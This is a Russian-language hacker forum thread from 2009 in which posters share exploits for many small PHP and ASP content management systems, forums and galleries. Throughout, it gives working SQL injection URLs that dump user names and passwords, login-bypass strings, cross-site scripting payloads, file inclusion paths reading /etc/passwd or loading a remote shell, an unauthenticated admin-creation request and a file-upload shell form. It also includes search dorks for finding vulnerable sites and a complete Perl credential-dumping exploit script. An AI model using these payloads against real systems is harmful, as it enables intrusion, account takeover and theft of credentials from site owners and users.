/openx/plugins/deliveryLimitations/Geo/Areacode.plugin.php
/openx/plugins/deliveryLimitations/Geo/City.delivery.php
/openx/plugins/deliveryLimitations/Geo/Organisation.delivery.php
/openx/plugins/statisticsFieldsTargeting/statisticsFieldsTargeting.php
/openx/plugins/statisticsFieldsTargeting/default/default.plugin.php
/openx/plugins/statisticsFieldsDelivery/statisticsFieldsDelivery.php
/openx/plugins/statisticsFieldsDelivery/default/default.plugin.php
/openx/plugins/statisticsFieldsDelivery/affiliates/affiliates.plugin.php
/openx/plugins/reports/admin/breakdown.plugin.php
/openx/plugins/reports/Reports.php
Узнаем версию:
/openx/UPGRADE.txt
/openx/TRANSLATIONS.txt
/openx/RELEASE_NOTES.txt
SQL Injection (Нужны права администратора):
/openx/www/admin/campaign-banners.php?clientid=1)+union+select+1,2,concat(us ername,0x3a,password),4,5+from+ox_users/*&campaignid=1
/openx/www/admin/campaign-edit.php?clientid=3)+union+select+1,2,concat(usern ame,0x3a,password),4,5+from+ox_users/*&campaignid=5
/openx/www/admin/banner-acl.php?clientid=1&campaignid=3&bannerid=1)+union+select+1,2,concat(username,0x3a, password),4,5,6+from+ox_users/*
SQL Инъекции валидны только тогда когда добавлено хотя бы одна учетная запись.

Активная XSS
При добавлении новой учетной записи уязвимые поля: "Имя" и "Контакты".
При добавлении нового клиента узвимы поля: "Имя", "Контакт" и "Комментарии".
При добавлении нового сайта уязвимы поля: "URL веб-сайта", "Имя" и "Контакт"
При добавлении новой зоны уязвимы поля: "Описание" и "Комментарий"
При добавлении нового канала таргетинга уязвимы поля: "Имя", "Описание" и "Комментарии".
При добавлении нового трекера уязвимы поля: "Имя" и "Описание"
Фильтрации нет вообще.

Пасивная XSS
/openx/www/admin/tracker-append.php?clientid=[CODE_XSS]&trackerid=1%27
/openx/www/admin/advertiser-trackers.php?clientid=[CODE_XSS]

Бояню от сюда: http://209.85.129.132/search?q=cache:yPQ62-iGZbcJ:https://forum.antichat.ru/showthread.php%3Fp%3D1038739+antichat.ru+openx

AFoST

24.01.2009, 03:23

производитель: kan-studio.ru
продукт Kandidat CMS v.1.3.1
pXSS
всё работает при register_globals=on

http://kandidat/admin/login.php?contentcenter=123'%22%3E%3Cscript%3Ealer t(1)%3C/script%3E

в исходнике проверяется лишь наличие куков, а на содержание пофик

get http://kandidat/media/upload.php?contentcenter=<script>alert(1)</script> HTTP/1.0
Host: kandidat
Cookie: KNcookies=123;
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Proxy-Connection: Keep-Alive

iSee

28.01.2009, 04:10

iPHPortal 1.37_02

Пасивная XSS
http://site/user/?back_url=/" [xss code]
http://site/user/?action=remind&back_url=/" [xss code]

Раскрытие путей
http://site/forums/?action=forum_add_message&forum_id[]=
http://site/include/func/db/common_db.inc.php?site=[]
http://site/include/func/db/split_sql_file.inc.php?site=[]

SQL-injection (нужны права админа)
http://site/admin/index.php?admin_url=rubric_edit.php?rubric_id=173+ union+select+1,2,3,concat_ws(0x3a,user_login,user_ password)+from+user+limit+0,1/*

Автор: iSee

baltazar

30.01.2009, 03:59

PHPSlideshow
XSS:
http://site/slideshow/index.php?directory=%27%3E%3Cscript%3Ealert(docume nt.cookie)%3C/script%3E

http://site/slideshow/index.php?directory=%3Cscript%3Edocument.location% 3D%27http://forum.antichat.rua%27%3C/script%3E

2 часа ночи,пока все:(

Dimi4

04.02.2009, 01:03

Уязвимости T-Xore [торрент портал]

Project : T-Xore (http://bit-torrent.net.ru/7-skript-torrent-indeksatora-giganova.org.html)
Found by: Dimi4
Date : 03.02.09
Auth bypass
login.php
Bug func:
if (isset($_POST['username'])&&isset($_POST['password'])){
$result = mysql_query("SELECT * FROM users WHERE username = '".$_POST['username']."' and password = '".md5($_POST['password'])."' LIMIT 1") or die (mysql_error());
if (mysql_num_rows($result) == 0){
stheader('Login Failed');
login_form($_POST['username'],'Username or password incorrect.');
footer();
exit();
}
Username: name' OR 1=1/*
Password: anything

Sql-inj
usertorrent.php
Bug func:
$result2 = mysql_query("SELECT * FROM torrents LEFT JOIN categories ON torrents.subcat = categories.subid WHERE posted_by='".strtolower($_GET['usuario'])."'") or die (mysql_error());

usertorrent.php?usuario=giga'+union+select+1,2,3,4 ,5,6,7,8,9,10,11,12,aes_decrypt(aes_encrypt(concat _ws(0x3a,username,password),0x71),0x71),14,15,16,1 7,18,19,20,21,22+from+users/*

Ех..дам там полной скулей.. ну нафиг

faza02

15.02.2009, 20:13

Автор: faza02
Сайт производителя: geeklog.net

GeekLog v1.3.7sr1

sql-inj:
/filemgmt/singlefile.php?lid=-133+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16/*
etc..

пассы хэшированы в md5.

таблицы юзеров: gl_user
колонки: username, passwd

[JavaScript]

15.02.2009, 21:01

Автор: [JavaScript]
Сайт производителя: geeklog.net
Респекты: faza02 за показание двига.
Версии выше GeekLog v1.3.7sr1

Passive XSS:
/filemgmt/singlefile.php?lid="><script>alert(/xss/)</script><!--

-m0rgan-

15.02.2009, 22:01

Профессиональная Open Source CMS
Сайт производителя: www.4site.ru
SQL injection в модуле portfolio:
http://4site.ru/portfolio/index.shtml?s=5&i=-26+union+select+1,2,3,version(),5,6,7,8,9--
http://4site.ru/portfolio/index.shtml?s=-12+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13--
SQL injection в модуле FAQ:
http://4site.ru/faq/index.shtml?th=-5+union+select+1,2,version(),4,5--

После нахождения мной этих уязвимостей я наткнулся на сайт с почти аналогичным обзором багов на этом ресурсе... линк (http://www.xaker.name/forvb/showthread.php?t=4278&page=27)
---------------------------------------------------
The End!

[JavaScript]

22.02.2009, 00:15

Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit

#!/usr/bin/perl -w
#================================================= ==========
# Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit
#================================================= ==========
#
# ,--^----------,--------,-----,-------^--,
# | ||||||||| `--------' | O .. CWH Underground Hacking Team ..
# `+---------------------------^----------|
# `\_,-------, _________________________|
# / XXXXXX /`| /
# / XXXXXX / `\ /
# / XXXXXX /\______(
# / XXXXXX /
# / XXXXXX /
# (________(
# `------'
#
#AUTHOR : CWH Underground
#DATE : 29 November 2008
#SITE : cwh.citec.us
#
#
################################################## ###
#APPLICATION : Lito Lite CMS
#DOWNLOAD : http://www.lovedesigner.net/files/download/lito_lite.zip
################################################## ####
#
#Note: magic_quotes_gpc = off
#
################################################## #####################################
#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
################################################## #####################################

use LWP::UserAgent;
use HTTP::Request;

if ($#ARGV+1 != 2)
{
print "\n==============================================\n";
print " Lito Lite Remote SQL Injection Exploit \n";
print " \n";
print " Discovered By CWH Underground \n";
print "==============================================\n";
print " \n";
print " ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| `--------' | O \n";
print " `+---------------------------^----------| \n";
print " `\_,-------, _________________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " `------' \n";
print " \n";
print "Usage : ./xpl.pl <Target> <Data Limit>\n";
print "Example: ./xpl.pl http://www.target.com/lito_lite 10\n";
exit();
}

$target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0];
$number = $ARGV[1];

print "\n++++++++++++++++++++++++++++++++++++++++++++++++ ++++++";
print "\n ..:: SQL Injection Exploit By CWH Underground ::.. ";
print "\n++++++++++++++++++++++++++++++++++++++++++++++++ ++++++\n";
print "\n[+]Dump Username and Password\n";

for ($start=0;$start<$number;$start++) {

$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
$req = HTTP::Request->new(GET => $target."/cate.php?cid=1%27%20and%201=2%20union%20select 1,2,3,concat(0x3a3a3a,username,0x3a3a,password,0x3 a3a3a),5,6,7,8,9,10%20from%20mx_user%20limit%201%2 0offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n";
$res = $xpl->request($req);
$info = $res->content;
$count=$start+1;

if ($info =~ /:::(.+):::/)
{
$dump=$1;
($username,$password)= split('::',$dump);
printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
}
else {
print "\n Exploit Done !!" or die "\n Exploit Failed !!\n";
exit;
}
}

# milw0rm.com [2008-11-29]

http://www.milw0rm.com/exploits/7294

mailbrush

01.03.2009, 19:02

Max Write System

Автор: mailbrush
Оффсайт: http://www.webwisesage.com/maxwrite/
Тип уязвимости: SQL Injection
http://www.site.com/maxwrite/diarypage.php?did=-1+{SQL Injection}
Google Dork: allinurl: diarypage.php?did=
PS: В теме SQL Инъекции я уже выклал все, что нагуглил =)

Kraneg

04.03.2009, 00:06

Wallist v1.2 - скрипт фотогаллереи
Уязвимость нашел: Kraneg
SQL-Inj:
1. при просмотре галереи в файле files/view.inc отсутствует фильтрация или вообще что то похожее на защиту от скули =(
Уязвимый код:
if(isset($_GET['pc']))
{
$query_pc = @mysql_query("select * from ".$separator."pod_categories where id_podcat=".$_GET['pc'].";");
if($query_pc)
{
//если запрос выполнен успешно
//Ищем категорию по данной подкатегории
$query_c= @mysql_query("select * from ".$separator."categories where id_cat=".mysql_result($query_pc,0,'id_cat').";");

if(!$query_c){show_error("Извените запрос на список категорий не выполнен, возможные причины:<li>Данного раздела не существует<li>Не доступна база данных");}
}

else {show_error("Извените запрос на подкатегорию не выполнен, возможные причины:<li>Данного подраздела не существует<li>Не доступна база данных");}

}
else
{
$query_c= @mysql_query("select * from ".$separator."categories where id_cat=".$_GET['c'].";");
if(!$query_c){show_error("Извените запрос на список категорий не выполнен, возможные причины:<li>Данного раздела не существует<li>Не доступна база данных");}
}
[....]
$cat['name']=@mysql_result($query_c,0,'name');
[....]
$p_cat['name']=@mysql_result($query_pc,0,'name');
[....]
echo "
<table width='100%'>
<tr><td width='50%'></td><td align=right>Раздел: ".$cat['name']."</td></tr>";
if (isset($p_cat)){echo "
<tr><td width='50%'></td><td align=right>Подраздел: ".$p_cat['name']."</td></tr>";
}
echo "
</table>
";
Пример использования уязвимости:
http://localhost/wallist/?action=ShowGallery&pc=-1+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4--
2.Отсутствие фильтрации в файле vote.php
Уязвимый код:
$user=mysql_query("select ip from rating where id_im=".$_GET['id']." and ip='".$_SERVER['REMOTE_ADDR']."';");
$rows=mysql_num_rows($user);
if($rows>0)
{
echo "<center><h3><font color=red>Вы уже участвовали в рейтинге по данной фотографии...";
}
Пример запроса:
Голосуем за какую ни будь фотографию и далее выполняем запрос
http://localhost/wallist/vote.php?action=vote&rating=12&id=[ID]+and+ASCII(lower(substring(version(),1,1)))=53--
где [ID] равен иду фотографии за которую голосовали, к примеру
http://localhost/wallist/vote.php??action=vote&rating=12&id=5+and+ASCII(lower(substring(version(),1,1)))=53--
Если версия 5(ASCII = 53) то скрипт выведет Вы уже участвовали в рейтинге по данной фотографии... если другая то Спасибо что проголосовали за данную фотографию! я привел версию для примера...
Там же к примеру никто не ограничивает нас в выставлении балов картинке, то есть максимальные 12 балов вовсе не максимальные =). К примеру выполним:
http://localhost/wallist/vote.php?action=vote&rating=4000000&id=4 и поставится картинке с идом 4 - 4000000 балов =))
3. Опять скуль =)
Уязвимость находится в файле view_large.inc приводить код не буду почти везде он однотипный.. =\
Пример использования:
http://localhost/wallist/?action=ShowGalleryFile&id=-4+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6,7,8--

XSS:
1.Активная xss в коментариях, не фильтруется поле name(files/addcom.inc)...
Уязвимый код:
if (!preg_match("/[0-9a-z_]+@[0-9a-z_^\.]+\.[a-z]{2,3}/i", $_GET['email']))
{

echo "<center><font color=red>Неверно введен е-mail. Введите e-mail
в виде <i>".$email."</i><br><a href='?action=ShowGalleryFile&id=".$_SESSION['id_im']."&functions=AddCom' title='Вернуться к форме'>[Вернуться к форме]</a>";
exit();
}

$query_com=@mysql_query("insert into ".$separator."comment values('',".$_GET['id'].",'".$_GET['name']."','".$_GET['email']."','".htmlspecialchars($_GET['text'])."',NOW(),'');");
2.Пасивная в скрипте vote.php:
Уязвимый код:
<b>Спасибо что проголосовали за данную фотографию!</b></font><font color='#0071FB' size=-1><br>
Данной фотографии вы поставили: ".$_GET['rating']."
пример:
http://localhost/wallist/vote.php?action=vote&rating=<script>alert()</script>&id=[ID]
где ID картинка за которую вы еще не голосовали...

Вобщем думаю это не все, просто это все, на что хватило меня =) стандартный префикс db_ таблица с пользователями user_name и user_password(в открытом виде) админа к сожалению там нет... он собственно в файле config.php =) так же скрипт за собой не то что не удаляет, даже не просит удалить папку install со всеми вытекающими... =\

-m0rgan-

04.03.2009, 23:54

Гостевая книга.
код: http://dump.ru/file/1946627

1. SQL inj
бажный код:

$result=mysql_query("SELECT id,msg,ans,author,topic,date,host,email FROM $tb WHERE ans=".$ref." ORDER BY id desc");

не фильтруются передаваемые даные.

exploit:
http://localhost/forum/forum.php?cmd=show&id=-6+union+select+group_concat(concat_ws(0x3a,id,msg, ans,author,topic,date,host,email,url))+from+forum--

татие скули почти во всех параметрах!

2. Активная XSS.

Ну здесь уязвимы все поля...
вл любом из них вводим "><script>alert(0x646f63756d656e742e636f6f6b6965)</script>
и видим куки)

Сильно не пинайте, знаю, что гостевая - один сплошной баг, но всеже решил опубликовать...
------------------------------------------------------------
The End!

[underwater]

07.04.2009, 21:03

emergocolab

LFI

Часть уязвимого кода:
if (isset($_GET["sitecode"])) {
include ("conf/global.conf");
$_SESSION["sitecode"]=$_GET["sitecode"];
$_SESSION['sitefolder']='site';
include ("conf/".strtolower($_GET["sitecode"]).".conf");

Exp:
http://site.ru/index.php?sitecode=../../../../../../../etc/passwd%00

SQL Inj

Exp: http://site.ru/viewprofile.php?p=-1%20union%20select%201,2,3,4,password,6,7,8,9,10,1 1,12,13,14,15,16,17+from+admin--

XSS

Exp:http://site.ru/?pageid=<script>alert("antichat")</script>

mailbrush

11.04.2009, 12:03

Simbas CMS 2.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием default.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://www.officetoweb.co.uk/demo/admin/default.asp
username: r0' or ' 1=1--
Password: r0' or ' 1=1--

Демонстрация:
http://www.officetoweb.co.uk/demo/admin/default.asp

© Semu

ph1l1ster

11.04.2009, 13:48

OrkZ CMS

XSS: (Все версии)

index.php?set=news&mc=read&date=<script>alert(document.cookie)</script>

Пример:

http://orkz.pogran.com/index.php?set=news&mc=read&date=<script>alert(document.cookie)</script>

p.s: cms не использует бд, на php инклуды ещё не смотрел)

[underwater]

12.04.2009, 21:23

Офф.сайт - http://www.phpsurveyor.org
В файле templates.php есть такой кусок:
if ($action == "upload") {
//Подгружаем файл в директорию :о))
$the_full_file_path = $publicdir."/templates/".$templatename . "/" .
$_FILES['the_file']['name'];
if (!@move_uploaded_file($_FILES['the_file']['tmp_name'], $the_full_file_path)) {
echo "<strong><font color='red'>"._ERROR."</font></strong><br />\n";
echo _IS_FAILUPLOAD."<br /><br />\n";
echo "<input $btstyle type='submit' value='"._GO_ADMIN."' onClick=\"window.open('$scriptname', '_top')\">\n";
echo "</td></tr></table>\n";
echo "</body>\n</html>\n";
exit;
}
}

Никакой фильтрации, вообще никакой...

Тоесть можем залить файл к ним на сервер и взять пермишенны www.

Формочка будет вылгядеть примерно так:
</table></form></td></tr><tr><td></td>
<td align='right' valign='top'>
<form enctype='multipart/form-data' name='importsurvey' action='http://victim/phpsurveyor/admin/templates.php' method='post'> <table><tr class='btstyle' >
<td align='right' valign='top' style='border: solid 1 #000080'>
<input class='btstyle' name="the_file" type="file" size="7">
<br /><input type='submit' value='Upload' class='btstyle' >
<input type='hidden' name='editfile' value=''>
<input type='hidden' name='screenname' value='Welcome Page'>
<input type='hidden' name='templatename' value='default'>
<input type='hidden' name='action' value='upload'>
</td>
</table>
</form>

Если все будет хорошо, то ссылка на файл будет выглядеть так:
http://victim/phpsurveyor/templates/default/file.php

К сожалению експлоит был написан до меня, милворм крушит труды% (

halkfild

15.04.2009, 14:35

Found : halkfild
Dork : "Powered By Aqua Cms"
Vendor: http://www.aquacms.net/
Advisory URL: http://crackfor.me/bugtraq/aquacms.v1.1.txt
Mail : bugtraq[d0g]crackfor.me

SQL-injections:
Need: magic quotes = off

vuln file: /droplets/functions/base.php
vuln code:

65:// Check the status of the orders

if(isset($_COOKIE["userSID"])) {
$sqltable = $sitename."_orders";
$selck = $_COOKIE["userSID"];
mysql_select_db($database, $dbconnect);
$query_cartcheck = "SELECT SID FROM $sqltable WHERE SID = '$selck' AND status = 1";
$cartcheck = mysql_query($query_cartcheck, $dbconnect) or die(mysql_error());
$row_cartcheck = mysql_fetch_assoc($cartcheck);
$totalRows_cartcheck = mysql_num_rows($cartcheck);

if ($totalRows_cartcheck != 0) {
$user_ip_address = $_SERVER['REMOTE_ADDR'];
$dt=date("YmdHis");
$UID="$dt$user_ip_address";
setcookie("userSID", $UID, time()+36000);
}

}
PoC: COOKIE: userSID='[foo]

Auth bypass
Need: magic quotes = off

vuln file: /admin/index.php
vuln code:

10:
if (isset($_POST['username']) == TRUE) {
$uusername = $_POST['username'];
$upassword = $_POST['password'];
$sqltable = $sitename."_users";
mysql_select_db($database, $dbconnect);
$query_getuser = "
SELECT *
FROM $sqltable
WHERE username = '$uusername'
AND password = '$upassword'
AND groups != ''
";
$getuser = mysql_query($query_getuser, $dbconnect) or die("Unable to select database");
$row_getuser = mysql_fetch_assoc($getuser);
$totalRows_getuser = mysql_num_rows($getuser);

if ($totalRows_getuser == 1) {
$uid = $row_getuser['id'];
$uun = $row_getuser['username'];
$ugr = $row_getuser['groups'];
$setwsuser = $uid.":".$uun.":".$ugr;
//setcookie("wsuser", $setwsuser, time()+36000, '/');
//header("Location: index.php");
}

// User logon: end
}

PoC: POST: username='[foo]
Exploit: POST: username=crackfor.me'+or+1=1+limit+1+--+

p.s. for cracking md5 hashes use http://crackfor.me - online md5 crack service (:

Twoster

16.04.2009, 12:38

Сайт производитель: http://www.adaptcms.com
Продукт: AdaptCMS
Версия: 1.3
SQL-inj
Есть RewriteRule ^page-([^/]+).html$ index.php?view=page&id=$1 , однако есть исходники! =)
Тянем хеш админа
http://www.sp.ru/
index.php?view=page&id=1'+union+select+1,username,3,password,5,6+from+ adaptcms_users--%20

LFI в админке
http://www.sp.ru/admin.php?view=install_plugin&url=../urllist.txt
http://www.sp.ru/admin.php?view=uninstall_plugin2 $_POST['url']=../urllist.txt
Загрузка произвольных файлов
http://www.sp.ru/admin.php?view=upload
P.S. На офф.сайте не работает! =(

Iceangel_

16.04.2009, 15:38

Lil' CMS
download: http://www.lilcms.com/lilcms/lilcms2.zip
dork: "Developed from orginal code by Lil' CMS"

Произвольное чтение и запись файлов
уязвимый код:
if($_POST["select"] && $_POST["Submit"]=="Load") {
//Readfile
$text=file_get_contents($CPATH.$_POST["select"]);
}

if($_POST["editing"] && $_POST["Submit"]=="Update") {
//Write file
$filename = $CPATH.$_POST["editing"];
$text=$_POST["textfield"];
$fp = fopen ($filename, "w");
$text = stripslashes($text);
fwrite($fp, $text);
fclose($fp);
}

эксплуатирование:
достаточно изменить POST-пакет, отсылаемый серверу, т.е. поправить значение переменной select, в случае чтения файла(select=../../../../../../../etc/passwd), и editing, в случае записи в файл(создает файл, если файл с таким именем отсутствует)

(с) Iceangel_

fker

17.04.2009, 20:13

Found : fker
Vendor: http://webylon.ru/
Type vuln: SQL injection
Vulnerable scripts:
bigimg.cgi
place.cgi
bigimg_galery.cgi
Parameter:id

POC,s:
http://[target]/bigimg.cgi?id={SQL}
http://[target]/cgi/place.cgi?id={SQL}
http://[target]/bigimg_galery.cgi?id={SQL}

sample:
https://forum.antichat.ru/showpost.php?p=1229194&postcount=8915

Iceangel_

19.04.2009, 09:32

Уязвимости SCMS
download: http://futurekast.com/fcms/php/SCMSv1.zip
dork: "Powered by SCMSv1"

LFI
уязвимый код:

if (!isset($_GET['p'])) { // no page specified -> load default page
include("../SCMSv1/includes/default.txt");
} else include("includes/" . $_GET['p'] . ".txt");

эксплуатирование:
index.php?p=../../../../../../../etc/passwd%00
если стоят мк, используем альтернативу нуллбайту http://raz0r.name/articles/null-byte-alternative/

(с) Iceangel_

ElteRUS

20.04.2009, 21:09

Kensei Board 1.1 (раньше DestinyBB)
Сайт: http://kenseiboard.com/

Ужасный форум.. его сурсами только детей пугать на ночь :\

SQL-injection
При magic_quotes_gpc=off

Уязвимый код:
forum.php

$forum = $_GET['f']; //forum number
…
$result = mysql_query( "SELECT * FROM forums_lf2713 WHERE id='$forum'" );
$row = mysql_fetch_array( $result );
$header = $row['header'];
…
<font face='arial' color='#ffffff' class='font1' size='1'>  <b>$header</b></font>

Эксплуатация:

site.com/forum.php?f=-1'+union+select+concat_ws(0x2f,email,username,pass word),2,3,4,5,6,7,8,9,10,11,12+from+admins_lf2713--+&o=a7754

[underwater]

20.04.2009, 21:16

Bahar Download Script
D

Download: http://www.aspdepo.org/indir2.asp?id=1085

Турки жгут))
http://www.site.com/patch/aspkat.asp?kid=28%20union+select+all+0,1,2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16+from+admin

ltaweb Alısveris Sistem

Download: http://www.aspindir.com/goster/5631

http://shop/urunler.asp?catno=38%20union+select+all+0,1,uname, upass,4,5,6,7,8,9,10,11,12+from+users

BloofoxCMS
Download: http://www.bloofox.com/download.21.html

magic_quotes_gpc = Off
register_globals = On

LFI:

http://site/plugins/spaw2/dialogs/dialog.php?lang=../../../../../../../../../../../../etc/passwd%00

wsCMS
Google dork: Powered by wsCMS

SQL Inj:
http://site.com/news.php?id=-1234+union+select+1,concat(username,char(58),user_ password)+from+phpbb_users+limit+1,1--

Blind SQL Inj:

http://site.com/news.php?id=1 and substring(@@version,1,1)=4
http://site.com/news.php?id=1 and substring(@@version,1,1)=5

Virtual War

Google Dork: Powered by Virtual War

http://site.com/extra/online.php?n=_member%20WHERE%20memberid=-999%20UNION%20SELECT%200,%43%4F%4E%43%41%54%28%6D% 65%6D%62%65%72%69%64%2C%30%78%33%41%2C%6E%61%6D%65 %2C%30%78%33%41%2C%70%61%73%73%77%6F%72%64%29%2C%3 2%0A%20FROM%20vwar_member%20%20/*

Online Universal Payment System System

http://site.com/index.php?read=../../../../../../../../../../etc/passwd

ElteRUS

21.04.2009, 14:02

PastelCMS 0.8.0
Сайт: http://pastel.pri.ee/

SQL-injection
При magic_quotes_gpc=off

Уязвимый код:
index.php

. . .
$sql_up = $mysql->query("SELECT * FROM ".$conf['mysql_prefix']."menu_struct WHERE id='$_GET[id]'");
$menu_up = $mysql->fetch_array($sql_up);
. . .

Эксплуатация:

http://site.ru/?id=-1'+union+select+1,concat_ws(0x2F,user,pass),3,4,5, 6,7,8,9,10,11,12,13,14+from+users--+

Authorization bypass
При magic_quotes_gpc=off

Уязвимый код:
admin.php

if($_GET['log'] == 'in') {
if($_POST['user'] != '' && $_POST['pass'] != '') {
$sql = $mysql->query("SELECT * FROM ".$conf['mysql_prefix']."users WHERE user='$_POST[user]' AND pass='".md5($_POST['pass'])."'");
$count = $mysql->num_rows($sql);
. . .

Эксплуатация:
В поле Username: ' or 1=1#
В поле Password что угодно

[underwater]

22.04.2009, 21:54

eXopera

Download: http://www.exopera.be/

Уязвимость в файле product.php:
Blind SQL Inj:

http://site.com/product.php?catid=1 and substring(@@version,1,1)=4

http://site.com/product.php?catid=1 and substring(@@version,1,1)=5

cpCommerce

Download: http://cpcommerce.cpradio.org/downloads.php

Уязвимость в файле document.php:
Blind SQL Inj:

http://site.com/document.php?id_document=1 and substring(@@version,1,1)=4

http://site.com/document.php?id_document=1 and substring(@@version,1,1)=5

Dimi4

22.04.2009, 23:21

CMSSite Vulnerabilities

Found by: Dimi4 [UASC]
Date: 22.04.09

XSS (search.php) :

http://localhost/CMSSite/search.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fsc ript%3E&x=0&y=0

LFI: admin.php

if(file_exists("$admin_dir/".$_REQUEST["mode"].".php") && $_REQUEST["mode"] != "delete" && $_REQUEST["mode"] != "logout")
{
include("$admin_dir/".$_REQUEST["mode"].".php");
}
/admin.php?mode=[path]//////////////////[..]

ElteRUS

23.04.2009, 19:17

Limeware CMS
Сайт: http://limeware-cms.com/

SQL-injection
При magic_quotes_gpc=off

Уязвимый код:
displayNews.php

. . .
if (strlen($_GET['id']) > 0) {
$this->id = $_GET['id'];
} else {
$this->id = 0;
. . .
$query = sprintf("SELECT id,title,author,date,body FROM %s WHERE id = '%s'", $this->tblnews, $this->id);
$this->newsResult = $this->DB_executeQuery($query, $this->newsLink);
. . .

Эксплуатация:

site.com/index.php?type=news&block=1&id=22'+and+1=2+union+select+1,concat_ws(0x2F,usern ame,password),3,4,5+from+tblusers--+

Iceangel_

26.04.2009, 18:00

Уязвимости Ninja Blog
download: http://www.ninjadesigns.co.uk/enter/blog.zip
dork: "Powered by Ninja Designs"

RFI

/entries/index.php
уязвимый код:

<?php
if (isset($_GET["cat"])) {
$page = $_GET["cat"].'.txt';
if (file_exists($page)) {
echo "<br /><a href=\"index.php\">< Back</a>";
@include ("$page");

эксплуатирование:

/entries/index.php?cat=ftp://login:pwd@host/shell.txt%00

(с) Iceangel_

Rubaka

26.04.2009, 23:09

TeamCal Pro Version 3.2.003
Downloads:http://www.lewe.com/index.php?option=com_docman&task=cat_view&gid=112&Itemid=45
Dork:Powered by TeamCal

можем добавить админа

уязвимый код

/addprofile.php
/**
* Check if allowed
*/
if (!checkAuth("admin")) {
// Not authorized. Get outta here
jsReload("index.php"); <- тут java-redirect!
}

эксплуатация:
/addprofile.php
отправляем POST запрос типа
username=1234567&password=1234&password2=1234&lastname=&firstname=&title=&position=&idnumber=&phone=&mobile=&email=&birthday=&opt_gender=ut_male&uo_language=english&uo_defgroup=default&lbxNotifyGroup=All&opt_usertype=ut_admin&custom1=&custom2=&custom3=&custom4=&custom5=&customFree=&customPopup=&btn_add=Add

все
admin:1234567
pass:1234

(с)Rubaka

Iceangel_

27.04.2009, 11:15

PluggedOut Blog
download: http://downloads.sourceforge.net/pluggedout/blog199i.zip
dork: "Powered by PluggedOut Blog"

LFI

уязвимый код:

index.php

if ( isset($_REQUEST["entryid"]) ){

if (is_numeric($_REQUEST["entryid"])){
$html = html_view_entry($_REQUEST["entryid"])

cмотрим функцию html_view_entry в файле html.php

function html_view_entry($entryid){

/--/
// Build the page
$html = build_page($sql_list,$sql_view,$sql_archive,$sql_c ategories,$sql_comments);

return $html;

cмотрим функцию build_page, в этом же файле

function build_page($sql_list,$sql_view,$sql_archive,$sql_c ategories="",$sql_comments=""){

global $theme;

// work out the current theme (allow for an override though)
if (isset($_REQUEST["theme"])){
$theme = $_REQUEST["theme"];
} else {
$theme = theme_get_name();
}

// include the theme (in order for following function calls to work)
if (file_exists("themes/".$theme."/theme.php")){
require "themes/".$theme."/theme.php";
} else {
header("Location: problem.php?f=build_page&p=theme_not_found");
}

эксплуатирование:

index.php?entryid=1&theme=../../../../../../../etc/passwd%00

(с) Iceangel_

[underwater]

28.04.2009, 00:46

FineArtPost

Download: http://www.fineartpost.com

XSS:
http://www.site.com/display_images.php?u_id=%22%3Cscript%3Ealert(1)%3C/script%3E%22

SQL Inj:
http://www.site.com/public/display_images.php?u_id=-210%20union%20select%201,2,3,4,5,6,version(),8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 0,61,62,63,64,65,66,67,68,69--

minimal-ablog 0.4

Download : http://code.google.com/p/minimal-ablog/downloads/list

SQL Inj:
http://www.site.com/index.php?id=-3%20union%20select%201,version(),3,4,5,6,7,8--

Загружаем любые файлы с правами админа: http://www.site.com/admin/uploader.php

Iceangel_

28.04.2009, 13:37

Уязвимости InTerra Blog Machine 1.70
download: http://essentialmind.com/files/interra_en.zip
dork: "Powered by InTerra Blog Machine"

SQL-injection(требования: magic_quotes=off)
уязвимый код:
index.php

switch($_GET['action']){
/--/
case 'section': {
include("actions/section.php");
break;
}
/--/

/actions/section.php (напрямую к нему не обратится, хтаццесс в папке мешает)

if(eregi('(.*)/$',$_GET['section'])){
$_GET['section'] = substr($_GET['section'],0,-1);
}
//figure out section settings (if any)
if(!$section = $db->getRow("SELECT * FROM int_category WHERE name = '".$_GET['section']."'")){
//is there a page maybe? (V 1.70)
if($page = $db->getRow("SELECT * FROM int_pages WHERE url = '".$_GET['section']."'")){
/--/

эксплуатирование:
index.php?action=section&section=1'+and+1=2+union+select+1,2,version(),4--+

PoC:
http://evilbotan.ru/?action=section&section=1'+and+1=2+union+select+1,2,user(),4--+
(обратите внимание на имя домена, злой ботан =) )

(с) Iceangel_

[underwater]

29.04.2009, 21:10

lcxBBportal

Download : http://code.google.com/p/lcxbbportal/downloads/list/lcxbbportal-0.1.A2.tar.gz

Vuln File: portal/includes/portal_block.php

Viln Code:
include($phpbb_root_path . 'includes/bbcode.' . $phpEx);
includes/acp/acp_lcxbbportal.php
$phpbb_portal_path = $phpbb_root_path . 'portal/';
